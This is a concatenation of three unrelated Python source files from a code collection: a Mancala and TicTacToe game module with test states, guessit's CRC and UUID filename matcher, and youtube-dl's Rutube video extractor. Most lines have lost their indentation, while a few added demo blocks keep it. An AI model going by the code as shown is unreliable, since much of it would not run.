            return state.utility if player == 'A' else -state.utility
        except AttributeError:
            pass
        board = state.board
        onA = 0
        for a in range(0, board.length):
            onA += board.a_spots[a]
        onB = 0
        for b in range(0, board.length):
            onB += board.b_spots[b]
        util = (board.a_pool + onA) - (board.b_pool + onB)
        state.utility = util
        return util if player == 'A' else -util
    def terminal_test(self, state):
        "A state is terminal if the player to move has no pieces left to sow."
        if len(self.actions(state)) == 0:
            # Sweep the remaining pieces into each player's pool (and clear
            # the pits so repeated calls do not double-count them).
            onA = 0
            for a in range(0, state.board.length):
                onA += state.board.a_spots[a]
                state.board.a_spots[a] = 0
            onB = 0
            for b in range(0, state.board.length):
                onB += state.board.b_spots[b]
                state.board.b_spots[b] = 0
            state.board.a_pool += onA
            state.board.b_pool += onB
            return True
        return False
def display(self, state):
board = state.board
print(' ',end=' ')
for b in range(0, board.length):
print(board.b_spots[(board.length-1)-b],end=' ')
print()
print(board.b_pool,end=' ')
for x in range(0, board.length):
print(' ',end=' ')
print(board.a_pool)
print(' ',end=' ')
for a in range(0, board.length):
print(board.a_spots[a],end=' ')
print()
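# Minimal demo of the Mancala class above. This is only a sketch: it assumes
# the aima-python modules (games.py) are importable, and it runs only when
# this file is executed directly rather than imported by the test harness.
if __name__ == "__main__":
    demo_game = Mancala()
    demo_state = GameState(to_move='A',
                           board=Board(3, [1, 1, 1], [1, 1, 1], 0, 0),
                           label='demo')
    demo_game.display(demo_state)
    for mv in demo_game.actions(demo_state):
        nxt = demo_game.result(demo_state, mv)
        print("move", mv, "-> utility for A:", demo_game.utility(nxt, 'A'))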
# class FlagrantCopy(Game):
# """A flagrant copy of TicTacToe, from game.py
# It's simplified, so that moves and utility are calculated as needed
# Play TicTacToe on an h x v board, with Max (first player) playing 'X'.
# A state has the player to move and a board, in the form of
# a dict of {(x, y): Player} entries, where Player is 'X' or 'O'."""
#
# def __init__(self, h=3, v=3, k=3):
# self.h = h
# self.v = v
# self.k = k
# self.initial = GameState(to_move='X', board={})
#
# def actions(self, state):
# try:
# return state.moves
# except:
# pass
# "Legal moves are any square not yet taken."
# moves = []
# for x in range(1, self.h + 1):
# for y in range(1, self.v + 1):
# if (x,y) not in state.board.keys():
# moves.append((x,y))
# state.moves = moves
# return moves
#
# # defines the order of play
# def opponent(self, player):
# if player == 'X':
# return 'O'
# if player == 'O':
# return 'X'
# return None
#
# def result(self, state, move):
# if move not in self.actions(state):
# return state # Illegal move has no effect
# board = state.board.copy()
# player = state.to_move
# board[move] = player
# next_mover = self.opponent(player)
# return GameState(to_move=next_mover, board=board)
#
# def utility(self, state, player):
# "Return the value to player; 1 for win, -1 for loss, 0 otherwise."
# try:
# return state.utility if player == 'X' else -state.utility
# except:
# pass
# board = state.board
# util = self.check_win(board, 'X')
# if util == 0:
# util = -self.check_win(board, 'O')
# state.utility = util
# return util if player == 'X' else -util
#
# # Did I win?
# def check_win(self, board, player):
# # check rows
# for y in range(1, self.v + 1):
# if self.k_in_row(board, (1,y), player, (1,0)):
# return 1
# # check columns
# for x in range(1, self.h + 1):
# if self.k_in_row(board, (x,1), player, (0,1)):
# return 1
# # check \ diagonal
# if self.k_in_row(board, (1,1), player, (1,1)):
# return 1
# # check / diagonal
# if self.k_in_row(board, (3,1), player, (-1,1)):
# return 1
# return 0
#
# # does player have K in a row? return 1 if so, 0 if not
# def k_in_row(self, board, start, player, direction):
# "Return true if there is a line through start on board for player."
# (delta_x, delta_y) = direction
# x, y = start
# n = 0 # n is number of moves in row
# while board.get((x, y)) == player:
# n += 1
# x, y = x + delta_x, y + delta_y
# x, y = start
# while board.get((x, y)) == player:
# n += 1
# x, y = x - delta_x, y - delta_y
# n -= 1 # Because we counted start itself twice
# return n >= self.k
#
# def terminal_test(self, state):
# "A state is terminal if it is won or there are no empty squares."
# return self.utility(state, 'X') != 0 or len(self.actions(state)) == 0
#
# def display(self, state):
# board = state.board
# for x in range(1, self.h + 1):
# for y in range(1, self.v + 1):
# print(board.get((x, y), '.'), end=' ')
# print()
myGame = Mancala()
play = GameState(
to_move = 'A',
board = Board(3,[1,1,1],[1,1,1],0,0),
label = 'play'
)
won = GameState(
to_move = 'A',
board = Board(3,[0,0,0],[0,0,0],4,2),
label = 'won'
)
lost = GameState(
to_move = 'A',
board = Board(3,[0,0,0],[0,0,0],2,4),
label = 'lost'
)
tied = GameState(
to_move = 'A',
board = Board(3,[0,0,0],[0,0,0],3,3),
label = 'tied'
)
winin1 = GameState(
to_move = 'A',
board = Board(3,[0,0,1],[0,0,0],3,2),
label = 'winin1'
)
# won = GameState(
# to_move = 'O',
# board = {(1,1): 'X', (1,2): 'X', (1,3): 'X',
# (2,1): 'O', (2,2): 'O',
# },
# label = 'won'
# )
#
# winin1 = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'X',
# (2,1): 'O', (2,2): 'O',
# },
# label = 'winin1'
# )
#
# losein1 = GameState(
# to_move = 'O',
# board = {(1,1): 'X', (1,2): 'X',
# (2,1): 'O', (2,2): 'O',
# (3,1): 'X',
# },
# label = 'losein1'
# )
#
# winin3 = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'O',
# (2,1): 'X',
# (3,1): 'O',
# },
# label = 'winin3'
# )
#
# losein3 = GameState(
# to_move = 'O',
# board = {(1,1): 'X',
# (2,1): 'X',
# (3,1): 'O', (1,2): 'X', (1,2): 'O',
# },
# label = 'losein3'
# )
#
# winin5 = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'O',
# (2,1): 'X',
# },
# label = 'winin5'
# )
#
# lost = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'X',
# (2,1): 'O', (2,2): 'O', (2,3): 'O',
# (3,1): 'X'
# },
# label = 'lost'
# )
class TemplateState: # one way to define the state of a minimal game.
def __init__(self, player): # add parameters as needed.
self.to_move = player
self.label = str(id(self)) # change this to something easier to read
# add code and self.variables as needed.
def __str__(self): # use this exact signature
return self.label
# class TemplateAction:
# '''
# It is not necessary to define an action.
# Start with actions as simple as a label (e.g., 'Down')
# or a pair of coordinates (e.g., (1,2)).
#
# Don't un-comment this until you already have a working game,
# and want to play smarter.
# '''
# def __lt__(self, other): # use this exact signature
# # return True when self is a better move than other.
# return False
class TemplateGame(Game):
'''
This is a minimal Game definition,
the shortest implementation I could run without errors.
'''
def __init__(self, initial): # add parameters if needed.
self.initial = initial
# add code and self.variables if needed.
def actions(self, state): # use this exact signature.
acts = []
# append all moves, which are legal in this state,
# to the list of acts.
return acts
def result(self, state, move): # use this exact signature.
newState = deepcopy(state)
# use the move to modify the newState
return newState
def terminal_test(self, state): # use this exact signature.
# return True only when the state of the game is over.
return True
def utility(self, state, player): # use this exact signature.
''' return:
>0 if the player is winning,
<0 if the player is losing,
0 if the state is a tie.
'''
return 0
def display(self, state): # use this exact signature.
# pretty-print the game state, using ASCII art,
# to help a human player understand his options.
print(state)
tg = TemplateGame(TemplateState('A')) # this is the game we play interactively.
myGames = {
myGame: [
play, won, lost, tied, winin1
# won,
# winin1, losein1, winin3, losein3, winin5,
# lost,
],
tg: [
# these are the states we tabulate when we test AB(1), AB(2), etc.
TemplateState('B'),
TemplateState('C'),
]
}
| mit |
Jusedawg/SickRage | lib/guessit/rules/properties/crc.py | 34 | 2273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
crc and uuid properties
"""
from rebulk.remodule import re
from rebulk import Rebulk
from ..common.validators import seps_surround
def crc():
"""
Builder for rebulk object.
:return: Created Rebulk object
:rtype: Rebulk
"""
rebulk = Rebulk().regex_defaults(flags=re.IGNORECASE)
rebulk.defaults(validator=seps_surround)
rebulk.regex('(?:[a-fA-F]|[0-9]){8}', name='crc32',
conflict_solver=lambda match, other: match
if other.name in ['episode', 'season']
else '__default__')
rebulk.functional(guess_idnumber, name='uuid',
conflict_solver=lambda match, other: match
if other.name in ['episode', 'season']
else '__default__')
return rebulk
_DIGIT = 0
_LETTER = 1
_OTHER = 2
_idnum = re.compile(r'(?P<uuid>[a-zA-Z0-9-]{20,})') # 1.0, (0, 0))
def guess_idnumber(string):
"""
Guess id number function
:param string:
:type string:
:return:
:rtype:
"""
# pylint:disable=invalid-name
ret = []
matches = list(_idnum.finditer(string))
for match in matches:
result = match.groupdict()
switch_count = 0
switch_letter_count = 0
letter_count = 0
last_letter = None
last = _LETTER
for c in result['uuid']:
if c in '0123456789':
ci = _DIGIT
elif c in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ':
ci = _LETTER
if c != last_letter:
switch_letter_count += 1
last_letter = c
letter_count += 1
else:
ci = _OTHER
if ci != last:
switch_count += 1
last = ci
# only return the result as probable if we alternate often between
# char type (more likely for hash values than for common words)
switch_ratio = float(switch_count) / len(result['uuid'])
letters_ratio = (float(switch_letter_count) / letter_count) if letter_count > 0 else 1
if switch_ratio > 0.4 and letters_ratio > 0.4:
ret.append(match.span())
return ret
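# Hedged usage sketch (not part of guessit): guess_idnumber() returns the
# spans of substrings that alternate between digits and letters often enough
# to look like hashes or ids. Runs only when this module is executed with the
# guessit package importable (e.g. via ``python -m``).
if __name__ == "__main__":
    sample = "Some.Show.S01E02.720p-1BBF2B6A9C3DE67A"
    # Should print one (start, end) span covering the trailing id-like token
    print(guess_idnumber(sample))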
| gpl-3.0 |
spvkgn/youtube-dl | youtube_dl/extractor/rutube.py | 20 | 11470 | # coding: utf-8
from __future__ import unicode_literals
import re
import itertools
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_parse_qs,
compat_urllib_parse_urlparse,
)
from ..utils import (
determine_ext,
bool_or_none,
int_or_none,
try_get,
unified_timestamp,
url_or_none,
)
class RutubeBaseIE(InfoExtractor):
def _download_api_info(self, video_id, query=None):
if not query:
query = {}
query['format'] = 'json'
return self._download_json(
'http://rutube.ru/api/video/%s/' % video_id,
video_id, 'Downloading video JSON',
'Unable to download video JSON', query=query)
@staticmethod
def _extract_info(video, video_id=None, require_title=True):
title = video['title'] if require_title else video.get('title')
age_limit = video.get('is_adult')
if age_limit is not None:
age_limit = 18 if age_limit is True else 0
uploader_id = try_get(video, lambda x: x['author']['id'])
category = try_get(video, lambda x: x['category']['name'])
return {
'id': video.get('id') or video_id if video_id else video['id'],
'title': title,
'description': video.get('description'),
'thumbnail': video.get('thumbnail_url'),
'duration': int_or_none(video.get('duration')),
'uploader': try_get(video, lambda x: x['author']['name']),
'uploader_id': compat_str(uploader_id) if uploader_id else None,
'timestamp': unified_timestamp(video.get('created_ts')),
'category': [category] if category else None,
'age_limit': age_limit,
'view_count': int_or_none(video.get('hits')),
'comment_count': int_or_none(video.get('comments_count')),
'is_live': bool_or_none(video.get('is_livestream')),
}
def _download_and_extract_info(self, video_id, query=None):
return self._extract_info(
self._download_api_info(video_id, query=query), video_id)
def _download_api_options(self, video_id, query=None):
if not query:
query = {}
query['format'] = 'json'
return self._download_json(
'http://rutube.ru/api/play/options/%s/' % video_id,
video_id, 'Downloading options JSON',
'Unable to download options JSON',
headers=self.geo_verification_headers(), query=query)
def _extract_formats(self, options, video_id):
formats = []
for format_id, format_url in options['video_balancer'].items():
ext = determine_ext(format_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', m3u8_id=format_id, fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
})
self._sort_formats(formats)
return formats
def _download_and_extract_formats(self, video_id, query=None):
return self._extract_formats(
self._download_api_options(video_id, query=query), video_id)
class RutubeIE(RutubeBaseIE):
IE_NAME = 'rutube'
IE_DESC = 'Rutube videos'
_VALID_URL = r'https?://rutube\.ru/(?:video|(?:play/)?embed)/(?P<id>[\da-z]{32})'
_TESTS = [{
'url': 'http://rutube.ru/video/3eac3b4561676c17df9132a9a1e62e3e/',
'md5': '1d24f180fac7a02f3900712e5a5764d6',
'info_dict': {
'id': '3eac3b4561676c17df9132a9a1e62e3e',
'ext': 'mp4',
'title': 'Раненный кенгуру забежал в аптеку',
'description': 'http://www.ntdtv.ru ',
'duration': 81,
'uploader': 'NTDRussian',
'uploader_id': '29790',
'timestamp': 1381943602,
'upload_date': '20131016',
'age_limit': 0,
},
}, {
'url': 'http://rutube.ru/play/embed/a10e53b86e8f349080f718582ce4c661',
'only_matching': True,
}, {
'url': 'http://rutube.ru/embed/a10e53b86e8f349080f718582ce4c661',
'only_matching': True,
}, {
'url': 'http://rutube.ru/video/3eac3b4561676c17df9132a9a1e62e3e/?pl_id=4252',
'only_matching': True,
}, {
'url': 'https://rutube.ru/video/10b3a03fc01d5bbcc632a2f3514e8aab/?pl_type=source',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
return False if RutubePlaylistIE.suitable(url) else super(RutubeIE, cls).suitable(url)
@staticmethod
def _extract_urls(webpage):
return [mobj.group('url') for mobj in re.finditer(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//rutube\.ru/embed/[\da-z]{32}.*?)\1',
webpage)]
def _real_extract(self, url):
video_id = self._match_id(url)
info = self._download_and_extract_info(video_id)
info['formats'] = self._download_and_extract_formats(video_id)
return info
class RutubeEmbedIE(RutubeBaseIE):
IE_NAME = 'rutube:embed'
IE_DESC = 'Rutube embedded videos'
_VALID_URL = r'https?://rutube\.ru/(?:video|play)/embed/(?P<id>[0-9]+)'
_TESTS = [{
'url': 'http://rutube.ru/video/embed/6722881?vk_puid37=&vk_puid38=',
'info_dict': {
'id': 'a10e53b86e8f349080f718582ce4c661',
'ext': 'mp4',
'timestamp': 1387830582,
'upload_date': '20131223',
'uploader_id': '297833',
'description': 'Видео группы ★http://vk.com/foxkidsreset★ музей Fox Kids и Jetix<br/><br/> восстановлено и сделано в шикоформате subziro89 http://vk.com/subziro89',
'uploader': 'subziro89 ILya',
'title': 'Мистический городок Эйри в Индиан 5 серия озвучка subziro89',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://rutube.ru/play/embed/8083783',
'only_matching': True,
}, {
# private video
'url': 'https://rutube.ru/play/embed/10631925?p=IbAigKqWd1do4mjaM5XLIQ',
'only_matching': True,
}]
def _real_extract(self, url):
embed_id = self._match_id(url)
# Query may contain private videos token and should be passed to API
# requests (see #19163)
query = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
options = self._download_api_options(embed_id, query)
video_id = options['effective_video']
formats = self._extract_formats(options, video_id)
info = self._download_and_extract_info(video_id, query)
info.update({
'extractor_key': 'Rutube',
'formats': formats,
})
return info
class RutubePlaylistBaseIE(RutubeBaseIE):
def _next_page_url(self, page_num, playlist_id, *args, **kwargs):
return self._PAGE_TEMPLATE % (playlist_id, page_num)
def _entries(self, playlist_id, *args, **kwargs):
next_page_url = None
for pagenum in itertools.count(1):
page = self._download_json(
next_page_url or self._next_page_url(
pagenum, playlist_id, *args, **kwargs),
playlist_id, 'Downloading page %s' % pagenum)
results = page.get('results')
if not results or not isinstance(results, list):
break
for result in results:
video_url = url_or_none(result.get('video_url'))
if not video_url:
continue
entry = self._extract_info(result, require_title=False)
entry.update({
'_type': 'url',
'url': video_url,
'ie_key': RutubeIE.ie_key(),
})
yield entry
next_page_url = page.get('next')
if not next_page_url or not page.get('has_next'):
break
def _extract_playlist(self, playlist_id, *args, **kwargs):
return self.playlist_result(
self._entries(playlist_id, *args, **kwargs),
playlist_id, kwargs.get('playlist_name'))
def _real_extract(self, url):
return self._extract_playlist(self._match_id(url))
class RutubeChannelIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:channel'
IE_DESC = 'Rutube channels'
_VALID_URL = r'https?://rutube\.ru/tags/video/(?P<id>\d+)'
_TESTS = [{
'url': 'http://rutube.ru/tags/video/1800/',
'info_dict': {
'id': '1800',
},
'playlist_mincount': 68,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/tags/video/%s/?page=%s&format=json'
class RutubeMovieIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:movie'
IE_DESC = 'Rutube movies'
_VALID_URL = r'https?://rutube\.ru/metainfo/tv/(?P<id>\d+)'
_TESTS = []
_MOVIE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/?format=json'
_PAGE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/video?page=%s&format=json'
def _real_extract(self, url):
movie_id = self._match_id(url)
movie = self._download_json(
self._MOVIE_TEMPLATE % movie_id, movie_id,
'Downloading movie JSON')
return self._extract_playlist(
movie_id, playlist_name=movie.get('name'))
class RutubePersonIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:person'
IE_DESC = 'Rutube person videos'
_VALID_URL = r'https?://rutube\.ru/video/person/(?P<id>\d+)'
_TESTS = [{
'url': 'http://rutube.ru/video/person/313878/',
'info_dict': {
'id': '313878',
},
'playlist_mincount': 37,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/video/person/%s/?page=%s&format=json'
class RutubePlaylistIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:playlist'
IE_DESC = 'Rutube playlists'
_VALID_URL = r'https?://rutube\.ru/(?:video|(?:play/)?embed)/[\da-z]{32}/\?.*?\bpl_id=(?P<id>\d+)'
_TESTS = [{
'url': 'https://rutube.ru/video/cecd58ed7d531fc0f3d795d51cee9026/?pl_id=3097&pl_type=tag',
'info_dict': {
'id': '3097',
},
'playlist_count': 27,
}, {
'url': 'https://rutube.ru/video/10b3a03fc01d5bbcc632a2f3514e8aab/?pl_id=4252&pl_type=source',
'only_matching': True,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/playlist/%s/%s/?page=%s&format=json'
@classmethod
def suitable(cls, url):
if not super(RutubePlaylistIE, cls).suitable(url):
return False
params = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
return params.get('pl_type', [None])[0] and int_or_none(params.get('pl_id', [None])[0])
def _next_page_url(self, page_num, playlist_id, item_kind):
return self._PAGE_TEMPLATE % (item_kind, playlist_id, page_num)
def _real_extract(self, url):
qs = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
playlist_kind = qs['pl_type'][0]
playlist_id = qs['pl_id'][0]
return self._extract_playlist(playlist_id, item_kind=playlist_kind)
| unlicense |